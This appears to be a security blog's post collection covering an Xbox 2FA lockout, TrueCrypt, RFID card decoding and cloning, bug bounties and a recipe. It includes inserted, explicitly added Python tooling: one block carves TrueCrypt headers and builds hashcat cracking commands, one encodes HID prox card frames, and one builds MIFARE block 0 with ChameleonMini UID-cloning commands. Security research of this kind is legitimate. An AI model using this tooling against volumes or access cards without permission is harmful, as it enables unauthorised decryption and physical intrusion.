Blog Posts

Xbox Account Lockout

Last month I got a new iPhone. This month I realized I forgot my Xbox One password when I tried to log in to download some Games With Gold.
I didn't think this would be a problem. I forget and reset passwords all the time.
So I go through the normal steps and have it send me an email:
(screenshot)
Then I get this screen:
(screenshot)
Did I mention I got a new phone? When you get a new phone the authenticator app resets and you have to add back your account, so I click "I don't know".
(screenshot)
I have to take responsibility for this. I didn't save a recovery code on my Mac, so I click "No" and I get this screen:
(screenshot)
This is where this goes off the rails for me. 30 days to reset my Xbox account because I enabled 2FA?
So I call Xbox support and Jacqueline says there is nothing they can do and I have to wait until January to reset my account password.
How does this make any sense? Without 2FA I could have reset my password in 30 seconds with no problem, but since I enabled it I won't be able to use my Xbox for a month?
Microsoft couldn't text me a one-time password, give me a call, or email an alternative email address? Someone decided 30 days was the right answer?
Microsoft, you are doing account management wrong. If you need me I will be buying a PS4.
UPDATE: After 2 hours and 43 minutes on the phone and zero help from any Microsoft staff I was able to find out that you can get a new recovery code for 2FA on the actual Xbox One console:
(photo of the console screen)
After I did that I was able to reset my password and disable 2FA.

Thoughts on TrueCrypt

On Wednesday night I tweeted this:


I started getting retweets and replies like this on Friday from people I respect (and a bunch from people I don’t know):


https://twitter.com/averagesecguy/status/674768017864134657
So either people REALLY like TrueCrypt or I didn't make my point articulately enough. In case it was the latter, I will lay it out here.
3 Reasons Why I Think You Should Stop Using TrueCrypt:
1. The developer stopped maintaining it, took down the webpage and replaced it with this:
"WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues".
(screenshot of the replacement page)
I think that this reason alone should be more than enough to get 99% of people to stop using it.
2. The latest version of hashcat includes support for TrueCrypt volumes.
If you are using a good passphrase (most people don't) this isn't a big deal by itself, but it lowers the skill needed to crack a TrueCrypt volume with a weak password from medium-high (think security professional) to downloading Kali and following instructions (think help desk analyst).
3. There are many other open source and paid alternatives that you can evaluate so you can pick the best one for you.
So unless you have an amazingly valid reason not to move off of TrueCrypt, you should move off of it as soon as possible.
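To make reason 2 concrete, here is the preprocessing step that the "follow the instructions" attack consists of. This is an added example, not code from the post or from hashcat: hashcat's TrueCrypt modes do not read the whole container, they take the raw 512-byte volume header (64-byte salt plus the encrypted header), and the script carves every header a volume can hold (standard, hidden, and the two backup copies at the end) and builds the hashcat argv for a given mode. The mode numbers are hashcat's documented TrueCrypt modes; the KDF labels used as dictionary keys ("ripemd160-boot" and so on) are this example's own names. The volume used in `demo()` is constructed filler, not a real container.

```python
"""Carve the 512-byte TrueCrypt volume headers that hashcat attacks.

Added example; not code from the original post or from hashcat. Offsets
follow the TrueCrypt 6/7 on-disk layout:

  standard header        offset 0
  hidden-volume header   offset 65536
  backup headers         in the last 131072 bytes of the volume
                         (standard copy at size-131072, hidden copy at size-65536)

The header is encrypted, so nothing in it says which KDF hash or cipher was
used; an attacker simply runs every mode against every header.
"""
import os
import tempfile

HEADER_SIZE = 512
SALT_SIZE = 64
HIDDEN_OFFSET = 65536
BACKUP_AREA = 131072

# hashcat mode numbers: header KDF hash x XTS key length (512 = single cipher,
# 1024 = two-cipher cascade, 1536 = three-cipher cascade). Key labels are ours.
HASHCAT_MODES = {
    ("ripemd160", 512): 6211, ("ripemd160", 1024): 6212, ("ripemd160", 1536): 6213,
    ("sha512", 512): 6221, ("sha512", 1024): 6222, ("sha512", 1536): 6223,
    ("whirlpool", 512): 6231, ("whirlpool", 1024): 6232, ("whirlpool", 1536): 6233,
    # system-encryption (boot) headers: RIPEMD-160 with the lower iteration count
    ("ripemd160-boot", 512): 6241, ("ripemd160-boot", 1024): 6242, ("ripemd160-boot", 1536): 6243,
}


def header_offsets(volume_size):
    """Return {name: byte offset} of every header a volume of this size can hold."""
    offsets = {"standard": 0, "hidden": HIDDEN_OFFSET}
    if volume_size >= 2 * BACKUP_AREA:  # room for the 128 KiB backup area at the end
        offsets["backup_standard"] = volume_size - BACKUP_AREA
        offsets["backup_hidden"] = volume_size - HIDDEN_OFFSET
    return offsets


def extract_headers(volume_path, out_dir):
    """Write each candidate header to out_dir/<name>.tc; return {name: path}."""
    size = os.path.getsize(volume_path)
    written = {}
    with open(volume_path, "rb") as vol:
        for name, offset in header_offsets(size).items():
            vol.seek(offset)
            blob = vol.read(HEADER_SIZE)
            if len(blob) != HEADER_SIZE:
                continue  # file too small to hold this header
            path = os.path.join(out_dir, f"{name}.tc")
            with open(path, "wb") as fh:
                fh.write(blob)
            written[name] = path
    return written


def split_header(blob):
    """Split a raw header into (salt, encrypted_header), the two inputs the KDF step uses."""
    if len(blob) != HEADER_SIZE:
        raise ValueError("TrueCrypt header must be exactly 512 bytes")
    return blob[:SALT_SIZE], blob[SALT_SIZE:]


def hashcat_command(header_path, kdf, xts_bits, wordlist):
    """Build the hashcat argv for one header file and one KDF/cipher-length guess."""
    mode = HASHCAT_MODES[(kdf, xts_bits)]
    return ["hashcat", "-a", "0", "-m", str(mode), header_path, wordlist]


def demo():
    """Constructed 512 KiB 'volume' (deterministic filler, not a real container):
    carve its headers and check each file holds the bytes at the right offset."""
    size = 512 * 1024
    volume = bytes((i * 7 + i // 256) & 0xFF for i in range(size))  # no 256-byte period
    with tempfile.TemporaryDirectory() as tmp:
        vol_path = os.path.join(tmp, "volume.tc")
        with open(vol_path, "wb") as fh:
            fh.write(volume)
        files = extract_headers(vol_path, tmp)
        offsets = header_offsets(size)
        matches = {}
        for name, path in files.items():
            with open(path, "rb") as fh:
                matches[name] = fh.read() == volume[offsets[name]:offsets[name] + HEADER_SIZE]
    return {
        "headers": sorted(files),
        "all_match": all(matches.values()),
        "example_cmd": hashcat_command("standard.tc", "ripemd160", 512, "rockyou.txt"),
    }


if __name__ == "__main__":
    print(demo())
```

The practical point is the loop you do not see: with twelve modes and up to four headers, a weak passphrase falls to a wordlist run per mode, and the only thing standing between the attacker and the volume is the passphrase's entropy, not any skill in handling the format.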
 

Decoding HID Proximity Cards

HID proximity cards encode a facility code and a card number; the most common format is 26-bit H10301, and the reader hands you the raw bits as a hex value. Decoding it is extremely easy and should take less than a minute.
Equipment Needed:
Omnikey Reader (I like the 5025CL)
RFIDIOt
BRIVO Card Calculator
Steps:
Run isotype.py from the RFIDIOt toolkit and copy the ID:
(terminal screenshot)
Paste the ID into the BRIVO decoder:
(screenshot of the BRIVO card calculator)
It is really that simple. I made a quick video demo (that is tinted purple for some reason):
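What the BRIVO calculator does for you, written out as an added example (not code from the post, from RFIDIOt or from BRIVO): encode and decode the 26-bit H10301 frame, including the two parity bits that are the only integrity check in the format. It assumes the value you copy from the reader is the bare 26-bit frame as hex with no preamble or sentinel bits in front of it; if your reader prepends those, strip them first. The facility code and card number used in the checks are made up.

```python
"""Encode and decode the 26-bit H10301 Wiegand frame used on standard HID prox cards.

Added example; not code from the original post, RFIDIOt or the BRIVO calculator.
Frame layout, MSB first (bit 0 .. bit 25):
  bit 0       even parity over bits 1-12
  bits 1-8    facility code (0-255)
  bits 9-24   card number (0-65535)
  bit 25      odd parity over bits 13-24
"""


def _parity(value):
    """Number of set bits modulo 2."""
    return bin(value).count("1") & 1


def encode_h10301(facility, card):
    """Return the 26-bit frame (as an int) for a facility code and card number."""
    if not 0 <= facility <= 0xFF:
        raise ValueError("facility code must fit in 8 bits")
    if not 0 <= card <= 0xFFFF:
        raise ValueError("card number must fit in 16 bits")
    body = (facility << 16) | card            # the 24 data bits
    left, right = body >> 12, body & 0xFFF    # halves covered by each parity bit
    even = _parity(left)                      # left half plus this bit must be even
    odd = 1 - _parity(right)                  # right half plus this bit must be odd
    return (even << 25) | (body << 1) | odd


def decode_h10301(frame):
    """Return (facility, card) from a 26-bit frame; raise ValueError on bad parity."""
    if frame < 0 or frame >> 26:
        raise ValueError("expected a 26-bit value")
    even, odd = (frame >> 25) & 1, frame & 1
    body = (frame >> 1) & 0xFFFFFF
    left, right = body >> 12, body & 0xFFF
    if _parity(left) != even:
        raise ValueError("even parity check failed")
    if _parity(right) == odd:
        raise ValueError("odd parity check failed")
    return body >> 16, body & 0xFFFF


def is_valid(frame):
    """True when both parity bits of the frame check out."""
    try:
        decode_h10301(frame)
        return True
    except ValueError:
        return False


def decode_hex(text):
    """Convenience wrapper for the hex string a reader prints, e.g. '2F764DD'."""
    return decode_h10301(int(text.strip().replace(" ", ""), 16))


if __name__ == "__main__":
    frame = encode_h10301(123, 45678)   # made-up facility code and card number
    print(f"{frame:07X}", decode_hex(f"{frame:X}"))
```

Note how little is in the frame: 8 bits of facility code and 16 bits of card number, with parity as the only check. Once one card from a site is read, every other card at that site differs from it in at most 16 bits.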

I have some writeable HID proximity cards on the way and will have a blog up soon on how to completely clone one.

$25 Handheld RFID Cloner

As part of my research into RFID security I came across the "EM4100 RFID Cloner kit" by KBEmbedded, which, outside of having a terrible name, is an amazing low-frequency (125 kHz) self-contained RFID cloner that can store and replay 16 cards.
(photo of the board)
I was lucky enough to be in the Portland area this week and have dinner with Kris Bahnsen, who designed the board. He said that he thinks he could rewrite the software to read and replay HID proximity cards, which would make this a must-have gadget for all security professionals.
As it stands now this is an awesome $25 tool that is amazingly fun to play with and you should order one!

Cloning UIDs with Chameleon

I have recently started investigating RFID security and picked up a Chameleon Mini.  It is an amazing project with a ton of potential. In these quick demo videos I will show how to clone the UID of both a Mifare 1K 4B card and a Mifare 1K 7B card using the Chameleon.
Cloning the Mifare 1K UID (Aria Card):

Cloning the Mifare 1K 7B UID  (Oyster Card):

These were both extremely simple to do.  In the future I will be demoing how to take full card dumps from an RFID card and load it on to the Chameleon Mini for a “true clone”.
Tool List: 
ACR122U
ChameleonMini
ZTerm
LibNFC
Cardpeek
Oyster Card
Aria Card
Hardware Picture: 
2015-12-02 07.55.17
Disclaimer: While cloning the UID isn't a full spoof of the card, WAY more organizations (read: most) rely on UID-based authentication than should. While the tools say the UIDs have been cloned, I have not tested these on any live systems and would not without permission.
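What actually gets copied in the two videos above, and what the later "true clone" has to get right, is the manufacturer block (block 0) of the card. The following is an added example, not code from the post or from the ChameleonMini project: it builds and checks block 0 for both the 4-byte and the 7-byte UID layouts, including the BCC check byte that a sloppy clone often gets wrong, and emits the two ChameleonMini lines that load a UID. The `CONFIG=` and `UID=` command names are assumed from the ChameleonMini RevG firmware; check them against your firmware's command reference. The UIDs, SAK and ATQA values used are constructed sample values.

```python
"""Build and check the MIFARE Classic manufacturer block (block 0) and emit
the ChameleonMini commands that load a UID.

Added example; not code from the original post or the ChameleonMini project.
Block 0 layout (read-only on genuine cards, writable on "magic" clones):
  4-byte UID: UID[4] | BCC[1] | SAK[1] | ATQA[2] | manufacturer data[8]
  7-byte UID: UID[7] |          SAK[1] | ATQA[2] | manufacturer data[6]
BCC is the XOR of the four UID bytes. ATQA is taken as the two bytes in the
order they appear in a dump (e.g. 04 00 for a 1K).
"""

BLOCK_SIZE = 16
CASCADE_TAG = 0x88  # reserved by ISO 14443-3; a 4-byte UID must not start with it
CHAMELEON_CONFIG = {4: "MF_CLASSIC_1K", 7: "MF_CLASSIC_1K_7B"}  # assumed RevG names


def bcc(uid):
    """Block check character: XOR of the UID bytes, as sent during anticollision."""
    result = 0
    for b in uid:
        result ^= b
    return result


def build_block0(uid, sak, atqa, manufacturer=b""):
    """Return the 16-byte block 0 for a 4- or 7-byte UID."""
    uid, atqa, manufacturer = bytes(uid), bytes(atqa), bytes(manufacturer)
    if len(atqa) != 2:
        raise ValueError("ATQA is two bytes")
    if len(uid) == 4:
        if uid[0] == CASCADE_TAG:
            raise ValueError("UID0 0x88 is the cascade tag, not a valid 4-byte UID")
        head, room = uid + bytes([bcc(uid)]), 8
    elif len(uid) == 7:
        head, room = uid, 6
    else:
        raise ValueError("MIFARE Classic UIDs are 4 or 7 bytes")
    if len(manufacturer) > room:
        raise ValueError(f"manufacturer data is at most {room} bytes for this UID size")
    return head + bytes([sak]) + atqa + manufacturer.ljust(room, b"\x00")


def parse_block0(block, uid_len):
    """Split block 0 into its fields; bcc_ok is None for 7-byte UIDs (no BCC there)."""
    block = bytes(block)
    if len(block) != BLOCK_SIZE:
        raise ValueError("block 0 is 16 bytes")
    if uid_len == 4:
        uid, rest = block[:4], block[5:]
        bcc_ok = block[4] == bcc(uid)
    elif uid_len == 7:
        uid, rest = block[:7], block[7:]
        bcc_ok = None
    else:
        raise ValueError("uid_len must be 4 or 7")
    return {
        "uid": uid.hex().upper(),
        "bcc_ok": bcc_ok,
        "sak": rest[0],
        "atqa": rest[1:3].hex().upper(),
        "manufacturer": rest[3:].hex().upper(),
    }


def chameleon_commands(uid):
    """ChameleonMini serial lines that select the right emulation and set the UID."""
    uid = bytes(uid)
    if len(uid) not in CHAMELEON_CONFIG:
        raise ValueError("MIFARE Classic UIDs are 4 or 7 bytes")
    return [f"CONFIG={CHAMELEON_CONFIG[len(uid)]}", f"UID={uid.hex().upper()}"]


if __name__ == "__main__":
    # constructed sample values, not read from a real card
    blk = build_block0(bytes.fromhex("DEADBEEF"), 0x08, bytes([0x04, 0x00]))
    print(blk.hex().upper(), parse_block0(blk, 4), chameleon_commands(blk[:4]))
```

When you move from the UID-only clone to a full dump, run `parse_block0` over block 0 of the dump first: a mismatched BCC or an ATQA/SAK that does not match the card type is exactly the kind of inconsistency a reader that checks more than the UID will trip on.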

Why Companies Fear Bug Bounty Programs

Yesterday Randy Westergren wrote this blog post: United Airlines Bug Bounty: An experience in reporting a serious vulnerability.  I do not know Randy and do not think he did anything wrong but his post is a perfect example of why companies I talk to are afraid of implementing bug bounty programs.
He hit the trinity of why companies fear bug bounty programs in one post:

  • Their development cycle wasn't fast enough for the researcher.
    (screenshot of the post)
    Is six months a "more than reasonable time frame"? On the surface, sure, but unless you go to their planning games and know their regulatory commitments, roadmap and backlog you cannot say that for sure. Most companies have enough internal and contractual pressure on their development cycles without a researcher who is "helping" adding another source.

  • The researcher involved the press:
    (screenshot of the post)
    Companies do not want to be in the press for having poor security. So sure, when he contacted the press they fixed the issue, but it didn't win him or security researchers any friends at United. Companies do not want to manage a bug bounty program as a fire-fighting exercise. They want to intake the bugs into their regular development cycle and work them in their normal process.

  • The researcher went "rogue":
    (screenshot of the post)
    He wasn't going to get compensated for his work since it was a duplicate, so the only kind of compensation he could still get was to go public. Companies can't pay for every duplicate bug found, and it only takes one researcher going rogue to sour a bug bounty program for a company.

While I do not fault Randy for his blog post or his thought process, a company gives up a lot of legal cover by running a bug bounty program. If it does not perform to a researcher's expectations and gets called out in this manner, that is a reason for it to think twice about the program and whether it is worth it.

Make Your Own Cranberry Sauce

I love Thanksgiving dinner.
I hate the omnipresent can-shaped cranberry sauce:
(picture of canned cranberry sauce)
Especially since making your own is this easy:
(photo)
Ingredients
1 cup sugar
1 cup orange juice
1/2 teaspoon ground cinnamon
One 12-ounce bag cranberries
Directions
Combine the sugar, orange juice, cinnamon, and cranberries in a medium saucepan.
Bring up to a simmer over medium heat and cook for 15 minutes.
Let cool completely before serving.
Enjoy!

DigiCert Security Summit

I was invited to attend the 2015 DigiCert Security Summit this week in Las Vegas. For a one-day conference it had some really amazing talks by some of the smartest people in the industry.
Gary McGraw gave an amazing talk on the secure software development life cycle and the Building Security In Maturity Model (BSIMM).
Emily Stark talked about the future of HTTPS everywhere and demoed the new Security panel in Chrome's developer tools:
(screenshot)
Dan Kaminsky did Dan Kaminsky stuff.

Runa Sandvik gave an amazing, humorous, thought-provoking and informative talk on protecting press sources on the internet.
(photo)
DigiCert also gave me this iOS-controlled drone, which seems to be amazingly hackable:
(photo)

Turn Off Shadows From OSX Screenshots

I take a lot of screenshots in OS X (⌘+shift+4) to share, and for the longest time I just lived with the 2003-era super cool shadow:
(screenshot with the drop shadow)
I finally got tired of it and found that turning it off takes these two terminal commands:
defaults write com.apple.screencapture disable-shadow -bool true
killall SystemUIServer

Now my screenshots look like this:
If for some reason you want to relive 2003, you can re-enable the drop shadow with these commands:
defaults write com.apple.screencapture disable-shadow -bool false
killall SystemUIServer

 
